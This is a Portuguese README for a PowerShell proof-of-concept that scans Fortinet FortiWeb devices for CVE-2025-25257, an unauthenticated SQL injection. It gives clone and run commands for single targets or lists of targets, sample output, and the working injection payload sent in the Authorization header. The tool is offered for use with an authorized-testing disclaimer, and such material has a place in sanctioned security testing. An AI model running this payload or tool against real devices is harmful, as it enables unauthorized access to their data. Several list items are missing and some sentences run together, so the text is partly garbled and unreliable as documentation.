
CVE-2025-25257 PoC para uso educacional e/ou testes de penetração autorizados.
Este script PowerShell foi projetado exclusivamente para fins de teste de penetração autorizado. Ele testa dispositivos Fortinet FortiWeb quanto à CVE-2025-25257, uma vulnerabilidade de injeção de SQL não autenticada no endpoint /api/fabric/device/status.
O script:
Aviso Importante:
Esta ferramenta destina-se exclusivamente ao uso ético e autorizado em cenários de teste de penetração ou avaliação de vulnerabilidades. O uso não autorizado pode violar leis como o Computer Fraud and Abuse Act (CFAA) ou regulamentações equivalentes em sua jurisdição. Certifique-se de ter permissão explícita do proprietário do alvo antes de executar este script. O autor não assume nenhuma responsabilidade por uso indevido.
Invoke-WebRequest integrado.git clone https://github.com/mr-r3b00t/CVE-2025-25257.git
cd CVE-2025-25257
O script está localizado em script.ps1.
Execute o script no PowerShell com uma das seguintes opções:
Especifique um único IP ou nome DNS, opcionalmente com uma porta (ex.: 192.168.1.1:443).
.\script.ps1 -Target "192.168.1.1:443"
Ou sem porta (verifica as portas padrão):
.\script.ps1 -Target "example.com"
Forneça um arquivo de texto com um alvo por linha (ex.: targets.txt).
.\script.ps1 -InputFile "targets.txt"
Exemplo de conteúdo do targets.txt:
192.168.1.1:443
example.com
10.0.0.1
O script exibirá resultados para cada alvo e porta, incluindo:
Exemplo de Saída:
Testing https://192.168.1.1:443/api/fabric/device/status for CVE-2025-25257
Endpoint accessible (HEAD 200 OK). Proceeding with GET request for vulnerability test.
GET Response Status: 200
Potential vulnerability detected (200 OK with payload). Check content for confirmation.
GET Response Content: {"devices": [...]}
Authorization (Bearer AAAAAA'or'1'='1).Contribuições são bem-vindas! Faça um fork do repositório e envie um pull request com melhorias, correções de bugs ou recursos adicionais.
Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes.
Para dúvidas ou problemas, abra uma issue no GitHub.